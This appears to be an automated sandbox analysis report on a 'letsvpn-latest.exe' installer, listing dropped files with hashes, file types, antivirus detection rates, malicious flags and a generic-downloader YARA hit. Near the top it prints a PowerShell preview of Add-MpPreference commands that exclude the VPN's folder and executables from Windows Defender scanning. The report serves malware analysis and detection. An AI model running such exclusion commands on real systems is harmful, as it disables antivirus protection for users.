SSDEEP: 6:IPeGgdEYC5BeGgdEEFmJovkBPeGgdEEFrGvkBPeGgdEEFwn0ZkBPeGgdEEFQr4MF:ISuFAuEcJxSuEJGQSuEyPSuESr1SuE6
MD5: B34636A4E04DE02D079BA7325E7565F0
SHA1: F32C1211EAC22409BB195415CB5A8063431F75CD
SHA-256: A9901397D39C0FC74ADFDB95DD5F95C3A14DEF3F9D58EF44AB45FC74A56D46DF
SHA-512: 6EB3255E3C89E2894F0085095FB5F6AB97349F0ED63C267820C82916F43A0AC014A94F98C186FF5D54806469A00C3C700A34D26DE90AFB090B80AC824A05AA2F
Malicious: true
Preview: Add-MpPreference -ExclusionPath "C:\Program Files (x86)\letsvpn"..Add-MpPreference -ExclusionProcess "LetsPRO.exe"..Add-MpPreference -ExclusionProcess "tapinstall.exe"..Add-MpPreference -ExclusionProcess "uninst.exe"..Add-MpPreference -ExclusionProcess "Update.exe"..Add-MpPreference -ExclusionProcess "ndp462-web.exe"

Process: C:\ProgramData\letsvpn-latest.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 247840
Entropy (8bit): 6.8984241672651985
Encrypted: false
SSDEEP: 6144:jZzvhs2Z4n1E7g34XtVYAOfTd/z44JsQw4UsrV:jJ+2Z4nShVY5JUCUu
MD5: 3530CB1B45FF13BA4456E4FFBCAE6379
SHA1: 5BE7B8E19418212A5A93E900C12830FACFD6BA54
SHA-256: E0669B6312BAAEF6A3C86F3142B333EAB48494511405398BB09CC464881A43C9
SHA-512: 23BAAE23815FC946203BE6D93CEF84FF23FDE8ED88017179C65B7DE1F3B6114BC8343C277B8AE5A1D85AA59F25B5F146C1D827B7E4617BFD0AA0FF20359F49B5
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1911328
                                                                                                                                                                                                  Entropy (8bit):5.911432104400453
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24576:IWltPuAnUCiag6CKM2zCy9sQuOjj1VgZej6GeS4lNrCze5qhYp4t9m2T:Vt3UCiag6CKM2zCyZuOjJaxSS5qhr
                                                                                                                                                                                                  MD5:FE1E856A9B3491135C7D0FFF820F7025
                                                                                                                                                                                                  SHA1:3DAEBB0C6DCE636D9E4309568AE1882CB30D4A7C
                                                                                                                                                                                                  SHA-256:ED1CF65B74438AD7AFACE47E0A613228C1E5C44C29B556D18AC797FBE7F2D7B7
                                                                                                                                                                                                  SHA-512:8D43C859414394945443224CCEB39241DD287786903290D3F774306734CACA44E8E50CC8258764DFF3C194BA95EBA2A35A230427CA26AF04A882356868D32996
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\letsvpn\Update.exe, Author: Joe Security
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):33
                                                                                                                                                                                                  Entropy (8bit):4.040775468486825
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:Gkg2day58L:GL2db8L
                                                                                                                                                                                                  MD5:862D9ED729F9BD1209A13C49C8388CFC
                                                                                                                                                                                                  SHA1:18C5C6FAAEC66D790893DD34D6A415879E36E92C
                                                                                                                                                                                                  SHA-256:A21ED21B8C02AD37840FB4374873858F650A7EBE9C29789D2562B51F30C2922B
                                                                                                                                                                                                  SHA-512:33C78DE82C4B449B59BEBA7BC7F700F5A9E271007B7D79A95C99F994CC15C151FD25471DD8682BEB06C55D4BB282E7890282947C8CD16419311E911900005FE5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:LetsPRO.exe Started Successfully.
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):113696
                                                                                                                                                                                                  Entropy (8bit):6.322809804830913
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:HARI0MvSAA6U7ks4jhOWE8i6wrNMRjYAZlfNASZfSOi3d3qKbE/mf:HWMpA6Agg8ahQYAZlFnUdXE/w
                                                                                                                                                                                                  MD5:C5485166B86B4CD6DE97C4DC8D0FBEFB
                                                                                                                                                                                                  SHA1:C047F339399098E7E4BF92EF7A8F38C1E5D5054D
                                                                                                                                                                                                  SHA-256:21678620BF5E7B4C8481270594B0A36615BE6152CA7A9396487364712236A3D5
                                                                                                                                                                                                  SHA-512:33EFDA5903587D17A698BFAEC6E5C119D4ADCFC23EA1588F2B155FFCBA88761E40E1DB791F545A064EFFDC63E6BA7AA68027C96B4A632331C0EA7297AC093F26
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.988106171788286
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:Ou/ZC45lIZhqWOHlLf2KQcvBZ96DJS+ShjmM6IGBkS6mSvh:R/Z/lkq3b2KZBZMdS+ST6nkH
                                                                                                                                                                                                  MD5:EEF5553A62C9421A730CAE5A74B196B4
                                                                                                                                                                                                  SHA1:829F4010C8B325EEA88568F751D94E9ADB760679
                                                                                                                                                                                                  SHA-256:53E1E7F75B35BA11DD781E747BA6190B010EB104BCCCC695A19D0F60C4F88468
                                                                                                                                                                                                  SHA-512:CC6484D1042A688D9380899DF46D7EABC524E1DB41978CE7F5F60CEF66E9DD0B6D00909AC3DEF47D2DF90E194D779BD278B4A18F9A6857A5A5876FB8957121FD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):7.012730771621166
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:24TduWhqWOHlLf2KQcvBZ9SaqS+ShjmM6IGBkSm:Jdnq3b2KZBZbqS+ST6nkd
                                                                                                                                                                                                  MD5:839E774D3E0B80A9C407A1269D66D11A
                                                                                                                                                                                                  SHA1:76578166AAFDA33F896F195C890E6A36D9EECF42
                                                                                                                                                                                                  SHA-256:ABB8794A52C85A16A4CAD28C99FEA73AE4730ED7B2F708EF58894CC1791217C9
                                                                                                                                                                                                  SHA-512:37199AC53A2F137C529373FDBC9DDCB1A64DA78BE0E37EF15B2AF31276C115BEA04E0BF557F8124687AF20357A5DD1F2D5BD0B8C2483E2B389EEDE1295C148FD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16416
                                                                                                                                                                                                  Entropy (8bit):6.978847822864083
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:DYMXhqWOHlLf2KQcvBZ9M+AS+ShjmM6IGBkSZ:Dxq3b2KZBZnAS+ST6nki
                                                                                                                                                                                                  MD5:B6634DCB0B38617B4345A4346DA620C7
                                                                                                                                                                                                  SHA1:D7F8903AF96F76B09189BB01B641A19B147138C8
                                                                                                                                                                                                  SHA-256:8A397246E984B4FD51A15C5E71BD217A92061F9AEC3CB6CFCB938834E9DD4B65
                                                                                                                                                                                                  SHA-512:ECD24F51763627E1CC90D0AA1491B5352B3222F744647821DBD8B18C080863A12FEB8FD79B1A4BEC733404D095FA37821280339C94C08CFEB142F632FA2CEC23
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):221216
                                                                                                                                                                                                  Entropy (8bit):7.175286065819943
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:qRP7/P97ilHDqO01ktQOzB4YjDnX08RYA3fP5SQm4:qRPpilHD+kQA4uk8RYA3f9
                                                                                                                                                                                                  MD5:C855A1C05CCD6547B4FF0CCA4D872D13
                                                                                                                                                                                                  SHA1:07D5A6BA39B36629AE598AC09FCF54B8A3FB5173
                                                                                                                                                                                                  SHA-256:F53A3E13BE932261994E12A14BC9607B32CB2FE39C31027A1CEFCA4B90CDC4A5
                                                                                                                                                                                                  SHA-512:33C0E60A9A212133F98B6D93409CF9FEDC4CBE537B2E01A35DCE5350DB565A13962B8B2281DE1926E93870414F1EC507666A435716BB1CFE777D6481CFF1ED71
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):56864
                                                                                                                                                                                                  Entropy (8bit):6.227644515850694
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:XfgAOG37OIh4Pqr8OvsQu4wwC9ZBMSq3b2KZBZpS+ST6nkYEIU:Xfgng6Ie1OvI4wwC9893qKj/mSU
                                                                                                                                                                                                  MD5:AAA8B3FA658B9620A798082968201334
                                                                                                                                                                                                  SHA1:660063E688A9C84F87B9F2C9F8FB11D5952139B9
                                                                                                                                                                                                  SHA-256:891C29FCB32C28C74E050BFD7D31D0C4C5FB2ABC5B877A542E25CB7DAA530189
                                                                                                                                                                                                  SHA-512:8AABA264914450716292D53AE86D631C37B3952304E51217CEC4BD83FE2BF958EF84D6C687D4D05A6D0FA52039A4856B393271C1E69D14A2454C1FAAB13F96AC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):629280
                                                                                                                                                                                                  Entropy (8bit):6.141793124988224
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:ZTTh6UXqQ0l0l2b4GQnn9lXNbOpIeQjDfjJcxm04FSh+0Nsj8X+iKbH2Yjot8J:HaQ0SnPNb8IbJImZo4LF
                                                                                                                                                                                                  MD5:7A9664E3077147897846682A2541F393
                                                                                                                                                                                                  SHA1:5BF7093E86D48AF5BEDB93AEA5F7415EB8DDB5D8
                                                                                                                                                                                                  SHA-256:23D5B87425994CBC03DAB7F9C30A70FB0DF0264FE15243DF4B9F9A7731D87ADB
                                                                                                                                                                                                  SHA-512:ED8C0F8F00E750E04857B3650546FEB1CEC80196D8EE4FEB5F7BB7A5C2A5CAAB7B379E963A3FE10847C5305C488D5FDC926F00952BD22E990CF11088BDEB3183
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7918112
                                                                                                                                                                                                  Entropy (8bit):6.369226842144576
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:98304:z1qq//2Zh39WUIKFE6gffcae/7ky9I83W2A:ZqrIKaf0L7kyS83W2A
                                                                                                                                                                                                  MD5:1135A24F997D3C473BFD8105223B93F3
                                                                                                                                                                                                  SHA1:EA5DB547FA0CBA6DBC588D975E73677F4CA8AC29
                                                                                                                                                                                                  SHA-256:0A6F43AFEC08D3BD41DA246A0AE22EFC4FB48C1788AA7890BCAC68CC22D0F780
                                                                                                                                                                                                  SHA-512:49B9CDD70FB84E55AC70872DDD49AAB40DD5438BDF6F39378C63BE6977D7F3C33B16C10505054050ED52FAE65B8FC755AB6901E6144813235DEEA894A81D0D40
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):124392
                                                                                                                                                                                                  Entropy (8bit):5.750227631115462
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:G803aH5iTX9ctYESyMlOs4u3yUyJCbtAYD7IPLdM1O3qKe/mU:X/wz9cyyM7kwwGOi/n
                                                                                                                                                                                                  MD5:764EF886ADF57B8C7233556114030BCB
                                                                                                                                                                                                  SHA1:F4FE2F5C57B27A1A23D286E18533E47466F18059
                                                                                                                                                                                                  SHA-256:26F5D45D9E94A2800B9752AD0D9FD83F97569E611A9ED45DCC36C0716F6A84CD
                                                                                                                                                                                                  SHA-512:DF19D04B1A2FD65098F99C64877301D76898724A5692F0166C0AC0E211C4F0395FD0DCDB7367F51096180D6BBE325AF30763902C992383BF090B9E9C3D8C7458
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1588256
                                                                                                                                                                                                  Entropy (8bit):6.9087996682239625
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24576:omFBUz/C41ab246LQ1+wa/AjHvKUY6qHpJ:DQCyab2o+wukvbf2
                                                                                                                                                                                                  MD5:56162A01D3DE7CB90EB9A2222C6B8F24
                                                                                                                                                                                                  SHA1:C4C10199B5F7D50D641D115F9D049832EC836785
                                                                                                                                                                                                  SHA-256:A41077ED210D8D454D627D15663B7523C33E6F7386CD920A56FBCFBB0A37547D
                                                                                                                                                                                                  SHA-512:23C4AAC046FFDECAA64ACBEE9579634C419202BE43463927DFABF9798DED17B1B7A1199F1DB54E247D28D82F39F3F352AC3ACBADE2118C67717FD37260BD8B4F
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with very long lines (5130)
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):27026
                                                                                                                                                                                                  Entropy (8bit):5.4569968058295055
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:xBrbCvYVVQRlc1zeeSgDNZ7UcpE69SZDhH1tW2:xnVSe3v7B79SZDhH1tW2
                                                                                                                                                                                                  MD5:11752AA56F176FBBBF36420EC8DB613A
                                                                                                                                                                                                  SHA1:0AFFC2837CEE71750450911D11968E0692947F13
                                                                                                                                                                                                  SHA-256:D66328EB01118A727E919B52318562094F2FF593BD33E5D3AAB5E73602388DFA
                                                                                                                                                                                                  SHA-512:ED78045E4B6B85A1A0557C2CCD85A27E90DEFC48E50D2833D3D8D23526DC8D1040A64E883CB42AEA3052D499EA4C95E775384AE710B1222191EAD6F8B0E0B560
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>.<configuration>. <configSections>. <section name="EnvConfig" type="System.Configuration.NameValueSectionHandler"/>. </configSections>. <startup>. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.6.2"/>. </startup>. <EnvConfig>. <add key="data" value="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
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):23072
                                                                                                                                                                                                  Entropy (8bit):6.539242531365027
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:e8KcT7wZJt+/AeHVSh1hqWOHlLf2KQcvBZ9ymGS+ShjmM6IGBkSL6B:NT7wZL+4a07q3b2KZBZhGS+ST6nkB
                                                                                                                                                                                                  MD5:4FB031CB8840EE01CB6AA90696557143
                                                                                                                                                                                                  SHA1:B009C8C975929B73DD977969E6816066D57F39C6
                                                                                                                                                                                                  SHA-256:64B09932EF5B25F5C2C185FE955C7784AB23CDF7D12FDAD77FE05947E20006BA
                                                                                                                                                                                                  SHA-512:03731C0F6423F2FA3D6710B86C7CC41AA970058B818AB724321040984841DC451109638C813D564CB89DD00AF3962E84811AED5A3B37AE9A1B9C1FEBEB85AE60
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):31264
                                                                                                                                                                                                  Entropy (8bit):6.461508448145288
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:43kT+4YzHC2I3fpmoq3b2KZBZUS+ST6nkc:p+tHCHv4L3qKW/mm
                                                                                                                                                                                                  MD5:59D3183B3719B7F94E21F783594C63E9
                                                                                                                                                                                                  SHA1:ECA6B8C4211A09338EDE54E72D0729D7288F304F
                                                                                                                                                                                                  SHA-256:5A23DFB54F4AAFB8409687ED44A3AFF776BBDCE5008133D05C2F9A6F4E8F9466
                                                                                                                                                                                                  SHA-512:14F61E069A0CC203357AC7ABF9DFA4B1CD688C9B02020577669CEA3085704C90D58F09179155DA175C00D03D5700144A84524018CED00A6DDDA01F912E182242
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  File Type:ASCII text, with very long lines (8772)
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):111769
                                                                                                                                                                                                  Entropy (8bit):6.012337158598234
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:aLYPh6117u2paSgOol55mwVCPEAdZe7xpO78I04oPEST3z/eZsS8fCB7GpC5E5mI:a661hDp2lmwgVZe7xpO78I04oPEST3zx
                                                                                                                                                                                                  MD5:212E515357106E809B265CF82CB3E43B
                                                                                                                                                                                                  SHA1:4CFCFF5464DCAF0111EB65D23EEDE7D9829A3DFB
                                                                                                                                                                                                  SHA-256:3DD3D520668D8CB24AFAB01B65B1995E325BF7834D33B58D39776E9CCBA6B358
                                                                                                                                                                                                  SHA-512:EB8432F286BA3B68A11365BDA9A964C4BD8D5C965BB23B04C46EC7247054420DE45BF75F92E59DFDD04E15B20D3EED071D58F8292F0D8941D42C7CF9C9CF4A93
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):123424
                                                                                                                                                                                                  Entropy (8bit):6.268913876963886
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:00OQlavbPZKNK9hhmPZEMn5xGFE45N+cX8fZzd97WWhT5wNSAQr7YTFoVaoOT8TQ:0b5vb/lmhMNGzWWhTdTK5N8Kg/I
                                                                                                                                                                                                  MD5:804EFCB7A1A2442810E3D05FDE0519DD
                                                                                                                                                                                                  SHA1:6FD55EC5795CEE7819B33EB2B86A99A2D2677D90
                                                                                                                                                                                                  SHA-256:181BB25BA4F3AF4BF678F6DA27C8B6AC6290308C144D5607B4978A6502B1C151
                                                                                                                                                                                                  SHA-512:8350BC4FD80527BA8C8FB12D5ECCCF62BF099DA06016EDEFA56FA0F24FC1EF387220DB1A9B434BE5136360599BC09F8AD92639122D5447143B55330B6ECC1D63
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):25120
                                                                                                                                                                                                  Entropy (8bit):6.665914468487181
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:AH9oR6XScb7Fj7t6Yq3b2KZBZVzS+ST6nkc:Ay6XScbJj7t6b3qKj/mC
                                                                                                                                                                                                  MD5:E5D273B75C14961ED64B6D6A847C5AE2
                                                                                                                                                                                                  SHA1:72BFFAE47ED211EFABE455448C821E696BA9075C
                                                                                                                                                                                                  SHA-256:8C7BD931B6535B314BD6DE57ED60B36529348FDFAC50F50055818E042FF8CF8D
                                                                                                                                                                                                  SHA-512:87B66800D0A7CBD58DC87DA33639BC844D937E32B441665966965CF39F9733B400786846581FACCCFE87EF86C1DD855940425FF449A53AD9955765626A38E807
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):53792
                                                                                                                                                                                                  Entropy (8bit):6.30664826170408
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:9qr8YZ2IPJ1hCmfPzcscksOOWwp/fFCHUHGoH0w8eKYIySh6TOq3b2KZBZHPS+S/:93aJBOkAHaUm08eKYIITB3qKl/mZ1
                                                                                                                                                                                                  MD5:80C2EAC1F7420578A13331614291866A
                                                                                                                                                                                                  SHA1:759C0EF56DB6F407E5796CE6DEE2D8D19EF367F3
                                                                                                                                                                                                  SHA-256:30B86B4326E0C77AB66392BEEA678934BD396D37CEE4C35C358783EA1CD4828B
                                                                                                                                                                                                  SHA-512:A1D118E3B1C6B522FB54ACEE5CC2B48F15044C622A285025D1478A2988B939284E274323E802A1B068B5610A010BF87E6F430689FD7987CE4A8B24D0FAF2E957
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):143904
                                                                                                                                                                                                  Entropy (8bit):6.0435655988094465
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:YXiDdWM0c7K9ES99d3+uVIQNlHK6Uav1vP8F6D0/5:zdWM0cW9EONvHKwvP8FWw
                                                                                                                                                                                                  MD5:BFFA4E71462CA66C7D8D918C90A341E9
                                                                                                                                                                                                  SHA1:20CA82B113D96225E34720B838AEEBE8F9B2980A
                                                                                                                                                                                                  SHA-256:9BBCCFE3E720F2B6ECB1EAD65C7AA95808DB459F6948B3D68328673D52C4A5B8
                                                                                                                                                                                                  SHA-512:4546BF89CB11FAA9E888DCDA503904EE4E50BF81A9C23BACF7C6F4146F035F97C37D351A7E6DBD040342C4751B8757CFD53B1C66696F2AE58594636DE6FD78BD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):24608
                                                                                                                                                                                                  Entropy (8bit):6.744944549827833
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:e/f1IDjV9UPPpWoq3b2KZBZeY8CS+ST6nkI:uf1IDjPOPpWL3qKI3C/mO
                                                                                                                                                                                                  MD5:02D5FC80DC55645778A4D78A24723780
                                                                                                                                                                                                  SHA1:13B2CAB89FF056437287369E1728D64943C71577
                                                                                                                                                                                                  SHA-256:2722C7F315E967D9676CE6B5BEB510D6FCEE0D6F5B05AEE1D69A563071D6E618
                                                                                                                                                                                                  SHA-512:78E6F13C680E883022C09E743253EE7A7ACF8F5C50DD3302D244D95D1E3D58ABC66029083320275D6485AC92F710401A064E1740EB67FE2D2329A2A516252DCD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):103456
                                                                                                                                                                                                  Entropy (8bit):6.150159893883683
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:jrf5GttgxHXEuRmG5rtkGY4CEmWAxXSSYhhS98ca2Wvsd65FJDlGWwkEyB3qKp+g:P5GttWHXEUx5r65LxXshk8JDIWPBoY/9
                                                                                                                                                                                                  MD5:EF4503A4D4843EE0342E775B66597B48
                                                                                                                                                                                                  SHA1:7C32086B782934EE2A1C3D0F87EA99E916CA2C61
                                                                                                                                                                                                  SHA-256:2116A48BEC23CCCC6B993654AD476E1F833F453548CFC209A9F21196BADB6B0B
                                                                                                                                                                                                  SHA-512:A4052E06CE8C17649FEC8B202AC316B9A44C9196BC7B019E1F31052C2AB77E9E338345B42F8A1E5C51278A51B776941261CCE2B0BC66A77EF542ADD8B596CC6B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):163360
                                                                                                                                                                                                  Entropy (8bit):6.226529376890851
